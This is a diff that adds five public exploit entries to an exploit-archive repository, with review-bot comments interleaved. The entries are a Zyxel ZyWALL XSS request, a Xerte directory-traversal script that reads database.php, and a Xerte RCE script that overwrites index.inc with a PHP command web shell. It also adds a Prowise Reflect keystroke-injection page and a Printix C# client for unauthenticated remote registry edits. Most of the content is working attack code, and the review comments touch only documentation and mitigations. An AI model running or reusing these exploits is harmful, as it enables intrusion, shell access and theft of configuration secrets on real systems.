diff --git a/exploits/multiple/webapps/50797.txt b/exploits/multiple/webapps/50797.txt
new file mode 100644
index 000000000..9b44053bf
--- /dev/null
+++ b/exploits/multiple/webapps/50797.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
+# Date: 1/3/2022
+# Exploit Author: Momen Eldawakhly (CyberGuy)
+# Vendor Homepage: https://www.zyxel.com
+# Version: ZyWALL 2 Plus
+# Tested on: Ubuntu Linux [Firefox]
+# CVE : CVE-2021-46387
+
+GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
+Host: vuln.ip:8080
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/php/webapps/50794.py b/exploits/php/webapps/50794.py
new file mode 100755
index 000000000..d13c627e9
--- /dev/null
+++ b/exploits/php/webapps/50794.py
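Review bot: The 50797.txt entry describes the issue only through the raw request, so a reader has to decode the `id` query string to learn that it is the reflected parameter of `/Forms/rpAuth_1`. `# Version: ZyWALL 2 Plus` names the product rather than a firmware build, which leaves defenders unable to scope which devices are affected. I would add a header line such as `# Description: the id parameter of /Forms/rpAuth_1 is reflected into the page without output encoding` and a `# Firmware tested: <firmware version>` line, both to be confirmed and filled in by the author.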
@@ -0,0 +1,58 @@ +# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated) +# Date: 05/03/2021 +# Exploit Author: Rik Lutz +# Vendor Homepage: https://xerte.org.uk +# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip +# Version: up until 3.10.3 +# Tested on: Windows 10 XAMP +# CVE : CVE-2021-44665 + +# This PoC assumes guest login is enabled. Vulnerable url: +# https:///getfile.php?file=/../../database.php +# You can find a userfiles-directory by creating a project and browsing the media menu. +# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download +# The userfiles-direcotry will be noted in the URL and/or when you download a file. +# They look like: -- + +import requests +import re + +xerte_base_url = "http://127.0.0.1" +file_to_grab = "/../../database.php" +php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here. + +with requests.Session() as session: + # Get a PHP session ID + if not php_session_id: + session.get(xerte_base_url) + else: + session.cookies.set("PHPSESSID", php_session_id) + + # Use a default template + data = { + 'tutorialid': 'Nottingham', + 'templatename': 'Nottingham', + 'tutorialname': 'exploit', + 'folder_id': '' + } + + # Create a new project in order to create a user-folder + template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data) + + # Find template ID + data = { + 'template_id': re.findall('(\d+)', template_id.text)[0] + } + + # Find the created user-direcotry: + user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data) + user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0] + + # Grab file + result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab) + print(result.text) + print("|-- Used Variables: --|") + 
print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID']) + print("user direcotry: " + user_direcotry) + print("Curl example:") + print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab) \ No newline at end of file diff --git a/exploits/php/webapps/50795.py b/exploits/php/webapps/50795.py new file mode 100755 index 000000000..7ed29b034 --- /dev/null +++ b/exploits/php/webapps/50795.py 
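Review bot: The header comment of 50794.py has lost its placeholders: `https:///getfile.php?file=/../../database.php` shows neither a host nor the user-files directory, and `They look like: --` no longer shows the directory pattern, so the description cannot be read without the code below it. The comment should spell the pattern out with labelled placeholders, e.g. `# https://<xerte-host>/getfile.php?file=<userfiles-dir>/../../database.php`, matching the three hyphen-separated parts the `USER-FILES` regex captures; `direcotry` is also misspelled throughout. A remediation line would help defenders, for instance `# Mitigation: upgrade past 3.10.3; disable guest login if unused`, which I infer from the `Version` line and the guest-login assumption and which the author should confirm.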
@@ -0,0 +1,185 @@ +# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated) +# Date: 05/03/2021 +# Exploit Author: Rik Lutz +# Vendor Homepage: https://xerte.org.uk +# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip +# Version: up until version 3.9 +# Tested on: Windows 10 XAMP +# CVE : CVE-2021-44664 + +# This PoC assumes guest login is enabled and the en-GB langues files are used. +# This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell. +# Vulnerable url: https:///website_code/php/import/fileupload.php +# The mediapath variable can be used to set the destination of the uploaded. +# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota + +import requests +import re + +xerte_base_url = "http://127.0.0.1" +php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here. + +with requests.Session() as session: + # Get a PHP session ID + if not php_session_id: + session.get(xerte_base_url) + else: + session.cookies.set("PHPSESSID", php_session_id) + + # Use a default template + data = { + 'tutorialid': 'Nottingham', + 'templatename': 'Nottingham', + 'tutorialname': 'exploit', + 'folder_id': '' + } + + # Create a new project in order to find the install path + template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data) + + # Find template ID + data = { + 'template_id': re.findall('(\d+)', template_id.text)[0] + } + + # Find the install path: + install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data) + install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0] + + headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', + 
'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3', + 'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978', + } + + # index.inc file + data = \ + '''-----------------------------170331411929658976061651588978 +Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc" +Content-Type: application/octet-stream + +"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; } +/** + * + * index.php english language file + * + * @author Patrick Lockley + * @version 1.0 + * @copyright Pat Lockley + * @package + */ + +define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password"); + +define("INDEX_USERNAME_EMPTY", "Please enter your username"); + +define("INDEX_PASSWORD_EMPTY", "Please enter your password"); + +define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available"); + +define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page"); + +define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct"); + +define("INDEX_LOGIN", "login area"); + +define("INDEX_USERNAME", "Username"); + +define("INDEX_PASSWORD", "Password"); + +define("INDEX_HELP_TITLE", "Getting Started"); + +define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website."); + +define("INDEX_HELP_INTRO_LINK_TEXT","Show me!"); + +define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. 
If you read the install guide other options are available"); + +define("INDEX_FOLDER_PROMPT","What would you like to call your folder?"); + +define("INDEX_WORKSPACE_TITLE","My Projects"); + +define("INDEX_CREATE","Project Templates"); + +define("INDEX_DETAILS","Project Details"); + +define("INDEX_SORT","Sort"); + +define("INDEX_SEARCH","Search"); + +define("INDEX_SORT_A","Alphabetical A-Z"); + +define("INDEX_SORT_Z","Alphabetical Z-A"); + +define("INDEX_SORT_NEW","Age (New to Old)"); + +define("INDEX_SORT_OLD","Age (Old to New)"); + +define("INDEX_LOG_OUT","Log out"); + +define("INDEX_LOGGED_IN_AS","Logged in as"); + +define("INDEX_BUTTON_LOGIN","Login"); + +define("INDEX_BUTTON_LOGOUT","Logout"); + +define("INDEX_BUTTON_PROPERTIES","Properties"); + +define("INDEX_BUTTON_EDIT","Edit"); + +define("INDEX_BUTTON_PREVIEW", "Preview"); + +define("INDEX_BUTTON_SORT", "Sort"); + +define("INDEX_BUTTON_NEWFOLDER", "New Folder"); + +define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create"); + +define("INDEX_BUTTON_DELETE", "Delete"); + +define("INDEX_BUTTON_DUPLICATE", "Duplicate"); + +define("INDEX_BUTTON_PUBLISH", "Publish"); + +define("INDEX_BUTTON_CANCEL", "Cancel"); + +define("INDEX_BUTTON_SAVE", "Save"); + +define("INDEX_XAPI_DASHBOARD_FROM", "From:"); + +define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:"); + +define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:"); + +define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups"); + +define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses"); + +define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard"); + +define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options"); + +define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns"); + +define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview"); + +define("INDEX_XAPI_DASHBOARD_PRINT", "Print"); +\r +\r +-----------------------------170331411929658976061651588978 +Content-Disposition: form-data; name="mediapath" + +''' \ + + install_path \ 
+ + '''../../../languages/en-GB/ +-----------------------------170331411929658976061651588978--\r +''' + + # Overwrite index.inc file + response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data) + print('Installation path: ' + install_path) + print(response.text) + if "success" in response.text: + print("Visit shell @: " + xerte_base_url + '/?cmd=whoami') \ No newline at end of file diff --git a/exploits/windows/remote/50796.html b/exploits/windows/remote/50796.html new file mode 100644 index 000000000..8686988eb --- /dev/null +++ b/exploits/windows/remote/50796.html @@ -0,0 +1,86 @@ +# Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection +# Date: 30/10/2022 +# Exploit Author: Rik Lutz +# Vendor Homepage: https://www.prowise.com/ +# Version: V1.0.9 +# Tested on: Windows 10 + +# Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection. +# Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed), +# or by visiting a malicious website. This POC contains the malicious webpage. +# Steps: +# 1. Start Prowise reflect +# 2. Try to connect to a reflect server e.q. ygm7u6od +# 3. When it is connecting click exploit +# - Start menu will open, types notepad.exe and types hello world. + + + + + + + + + + + +
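Review bot: The header comment of 50795.py says the script overwrites the installed en-GB `index.inc`, but it does not say that the original file is never restored, which matters to anyone reproducing this on a lab instance for detection work. The vulnerable-URL line has also lost its host placeholder (`https:///website_code/php/import/fileupload.php`), and `wil`, `langues` and `englisch` are misspelled. I would add `# Note: replaces languages/en-GB/index.inc in place; back up the file before testing in a lab` and, for defenders, `# Detection: POSTs to fileupload.php whose mediapath contains ../, and unexpected changes to languages/*/*.inc`.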
+ Exploit! +
+ + + \ No newline at end of file diff --git a/exploits/windows/remote/50798.cs b/exploits/windows/remote/50798.cs new file mode 100644 index 000000000..90aa53344 --- /dev/null +++ b/exploits/windows/remote/50798.cs 
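Review bot: The header block of 50796.html uses `#` lines, which are not comments in an HTML file and would be rendered as page text; it should be wrapped in `<!-- ... -->`. `# Date: 30/10/2022` is later than the dates on the other entries added in this commit (1/3/2022 and 3/1/2022), so it looks like a typo the author should confirm. The description names port 8082 but gives no fixed version or workaround; a line such as `# Mitigation: <fixed version>; filtering inbound 8082 covers the network path only, not the browser path` would make the entry usable for exposure assessment, with the version supplied by the author.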
@@ -0,0 +1,413 @@ +# Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE) +# Date: 3/1/2022 +# Exploit Author: Logan Latvala +# Vendor Homepage: https://printix.net +# Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip +# Version: <= 1.3.1106.0 +# Tested on: Windows 7, Windows 8, Windows 10, Windows 11 +# CVE : CVE-2022-25089 +# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089 + +using Microsoft.Win32; +using Newtonsoft.Json; +using Newtonsoft.Json.Converters; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.Linq; +using System.Text; +using System.Threading; +using System.Threading.Tasks; + +/** + * ________________________________________ + * + * Printix Vulnerability, CVE-2022-25089 + * Part of a Printix Vulnerability series + * Author: Logan Latvala + * Github: https://github.com/ComparedArray/printix-CVE-2022-25089 + * ________________________________________ + * + */ + + +namespace ConsoleApp1a +{ + + public class PersistentRegistryData + { + public PersistentRegistryCmds cmd; + + public string path; + + public int VDIType; + + public byte[] registryData; + } + + [JsonConverter(typeof(StringEnumConverter))] + public enum PersistentRegistryCmds + { + StoreData = 1, + DeleteSubTree, + RestoreData + } + public class Session + { + public int commandNumber { get; set; } + public string host { get; set; } + public string data { get; set; } + public string sessionName { get; set; } + public Session(int commandSessionNumber = 0) + { + commandNumber = commandSessionNumber; + switch (commandSessionNumber) + { + //Incase it's initiated, kill it immediately. + case (0): + Environment.Exit(0x001); + break; + + //Incase the Ping request is sent though, get its needed data. + case (2): + Console.WriteLine("\n What Host Address? 
(DNS Names Or IP)\n"); + Console.Write("IP: "); + host = Console.ReadLine(); + Console.WriteLine("Host address set to: " + host); + + data = "pingData"; + sessionName = "PingerRinger"; + break; + + //Incase the RegEdit request is sent though, get its needed data. + case (49): + Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); + Console.Write("IP: "); + host = Console.ReadLine(); + Console.WriteLine("Host address set to: " + host); + + PersistentRegistryData persistentRegistryData = new PersistentRegistryData(); + persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData; + persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType; + //persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName"; + Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n"); + Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n"); + Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE"); + Console.Write("Registry Node: "); + persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix"); + Console.WriteLine("Full Address Set To: " + persistentRegistryData.path); + + //persistentRegistryData.registryData = new byte[2]; + //byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String); + + Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n"); + Console.Write("Type: "); + int dataF = int.Parse(Console.ReadLine()); + Console.WriteLine("Set Data to: " + dataF); + + Console.WriteLine("\n What value is your type? \n"); + Console.Write("Value: "); + string dataB = Console.ReadLine(); + Console.WriteLine("Set Data to: " + dataF); + + byte[] loader = null; + List byteContainer = new List(); + //Dword = 4 + //SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!) 
+ + switch (dataF) + { + case (1): + + loader = selectDataType(dataB, RegistryValueKind.String); + byteContainer.Add(1); + break; + case (2): + loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord); + byteContainer.Add(4); + break; + case (3): + loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord); + byteContainer.Add(11); + break; + case (4): + loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString); + byteContainer.Add(7); + break; + + } + + int pathHolder = 0; + foreach (byte bit in loader) + { + pathHolder++; + byteContainer.Add(bit); + } + + persistentRegistryData.registryData = byteContainer.ToArray(); + //added stuff: + + //PersistentRegistryData data = new PersistentRegistryData(); + //data.cmd = PersistentRegistryCmds.RestoreData; + //data.path = ""; + + + //data.cmd + Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData)); + data = JsonConvert.SerializeObject(persistentRegistryData); + + break; + //Custom cases, such as custom JSON Inputs and more. + case (100): + Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); + Console.Write("IP: "); + host = Console.ReadLine(); + Console.WriteLine("Host address set to: " + host); + + Console.WriteLine("\n What Data Should Be Sent?\n"); + Console.Write("Data: "); + data = Console.ReadLine(); + Console.WriteLine("Data set to: " + data); + + Console.WriteLine("\n What Session Name Should Be Used? \n"); + Console.Write("Session Name: "); + sessionName = Console.ReadLine(); + Console.WriteLine("Session name set to: " + sessionName); + break; + } + + + } + public static byte[] selectDataType(object value, RegistryValueKind format) + { + byte[] array = new byte[50]; + + switch (format) + { + case RegistryValueKind.String: //1 + array = Encoding.UTF8.GetBytes((string)value); + break; + case RegistryValueKind.DWord://4 + array = ((!(value.GetType() == typeof(int))) ? 
BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value)); + break; + case RegistryValueKind.QWord://11 + if (value == null) + { + value = 0L; + } + array = BitConverter.GetBytes((long)value); + break; + case RegistryValueKind.MultiString://7 + { + if (value == null) + { + value = new string[1] { string.Empty }; + } + string[] array2 = (string[])value; + foreach (string s in array2) + { + byte[] bytes = Encoding.UTF8.GetBytes(s); + byte[] second = new byte[1] { (byte)bytes.Length }; + array = array.Concat(second).Concat(bytes).ToArray(); + } + break; + } + } + return array; + } + } + class CVESUBMISSION + { + static void Main(string[] args) + { + FORCERESTART: + try + { + + //Edit any registry without auth: + //Use command 49, use the code provided on the desktop... + //This modifies it directly, so no specific username is needed. :D + + //The command parameter, a list of commands is below. + int command = 43; + + //To force the user to input variables or not. + bool forceCustomInput = false; + + //The data to send, this isn't flexible and should be used only for specific examples. + //Try to keep above 4 characters if you're just shoving things into the command. + string data = "{\"profileID\":1,\"result\":true}"; + + //The username to use. + //This is to fulfill the requriements whilst in development mode. + DefaultValues.CurrentSessName = "printixMDNs7914"; + + //The host to connect to. DEFAULT= "localhost" + string host = "192.168.1.29"; + + // Configuration Above + + InvalidInputLabel: + Console.Clear(); + Console.WriteLine("Please select the certificate you want to use with port 21338."); + //Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now. + Console.WriteLine("Already selected, client authentication isn't needed."); + + Console.WriteLine(" /───────────────────────────\\ "); + Console.WriteLine("\nWhat would you like to do?"); + Console.WriteLine("\n 1. 
Send Ping Request"); + Console.WriteLine(" 2. Send Registry Edit Request"); + Console.WriteLine(" 3. Send Custom Request"); + Console.WriteLine(" 4. Experimental Mode (Beta)\n"); + Console.Write("I choose option # "); + + try + { + switch (int.Parse(Console.ReadLine().ToLower())) + { + case (1): + Session session = new Session(2); + + command = session.commandNumber; + host = session.host; + data = session.data; + DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); + + + + break; + case (2): + Session sessionTwo = new Session(49); + + command = sessionTwo.commandNumber; + host = sessionTwo.host; + data = sessionTwo.data; + DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); + + break; + case (3): + + Console.WriteLine("What command number do you want to input?"); + command = int.Parse(Console.ReadLine().ToString()); + Console.WriteLine("What IP would you like to use? (Default = localhost)"); + host = Console.ReadLine(); + Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)"); + data = Console.ReadLine(); + + Console.WriteLine("What session name do you want to use? "); + DefaultValues.CurrentSessName = Console.ReadLine(); + break; + case (4): + Console.WriteLine("Not yet implemented."); + break; + } + } + catch (Exception e) + { + Console.WriteLine("Invalid Input!"); + goto InvalidInputLabel; + } + + Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala"); + Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n"); + + CompCommClient client = new CompCommClient(); + + + byte[] responseStorage = new byte[25555]; + int responseCMD = 0; + client.Connect(host, 21338, 3, 10000); + + client.SendMessage(command, Encoding.UTF8.GetBytes(data)); + // Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it. 
+ // Check for output multiple times, and see if this is conclusive. + + + + //client.SendMessage(51, Encoding.ASCII.GetBytes(data)); + new Thread(() => { + //Thread.Sleep(4000); + if (client.Connected()) + { + int cam = 0; + // 4 itterations of loops, may be lifted in the future. + while (cam < 5) + { + + //Reads the datastream and keeps returning results. + //Thread.Sleep(100); + try + { + try + { + if (responseStorage?.Any() == true) + { + //List byo1 = responseStorage.ToList(); + if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption")) + { + foreach (char cam2 in Encoding.UTF8.GetString(responseStorage)) + { + if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2)) + { + Console.Write(cam2); + } + } + }else + { + + } + } + + } + catch (Exception e) { Debug.WriteLine(e); } + client.Read(out responseCMD, out responseStorage); + + } + catch (Exception e) + { + goto ReadException; + } + Thread.Sleep(100); + cam++; + //Console.WriteLine(cam); + } + + + + + } + else + { + Console.WriteLine("[WARNING]: Client is Disconnected!"); + } + ReadException: + try + { + Console.WriteLine("Command Variable Response: " + responseCMD); + Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD); + client.disConnect(); + } + catch (Exception e) + { + Console.WriteLine("After 4.2 Seconds, there has been no response!"); + client.disConnect(); + } + }).Start(); + + Console.WriteLine(responseCMD); + Console.ReadLine(); + + } + + catch (Exception e) + { + Console.WriteLine(e); + Console.ReadLine(); + + //Environment.Exit(e.HResult); + } + + goto FORCERESTART; + } + } +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f4989230f..8dfd726eb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
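Review bot: 50798.cs opens with `# Exploit Title: …` lines, which are not valid C# comments because a leading `#` starts a preprocessor directive; the header should use `//` or move inside the existing `/** … */` banner. In the reader thread, the comment `// 4 itterations of loops` disagrees with the loop condition `while (cam < 5)`, so one of the two should be corrected. The header gives `# Version: <= 1.3.1106.0` but no fixed release; a line such as `# Fixed in: <fixed version>`, plus a note that port 21338 should not be reachable from untrusted hosts, would help defenders scope exposure.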
@@ -18630,6 +18630,8 @@ id,file,description,date,author,type,platform,port
 50781,exploits/windows/remote/50781.txt,"Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)",1970-01-01,"Amel BOUZIANE-LEBLOND",remote,windows,
 50783,exploits/hardware/remote/50783.py,"ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD",1970-01-01,LiquidWorm,remote,hardware,
 50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware,
+50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows,
+50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44863,3 +44865,6 @@ id,file,description,date,author,type,platform,port
 50786,exploits/php/webapps/50786.rb,"Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)",1970-01-01,"Talha Karakumru",webapps,php,
 50788,exploits/linux/webapps/50788.txt,"Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,Ghuliev,webapps,linux,
 50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",1970-01-01,"Mayank Deshmukh",webapps,multiple,
+50794,exploits/php/webapps/50794.py,"Xerte 3.10.3 - Directory Traversal (Authenticated)",1970-01-01,"Rik Lutz",webapps,php,
+50795,exploits/php/webapps/50795.py,"Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Rik Lutz",webapps,php,
+50797,exploits/multiple/webapps/50797.txt,"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)",1970-01-01,"Momen Eldawakhly",webapps,multiple,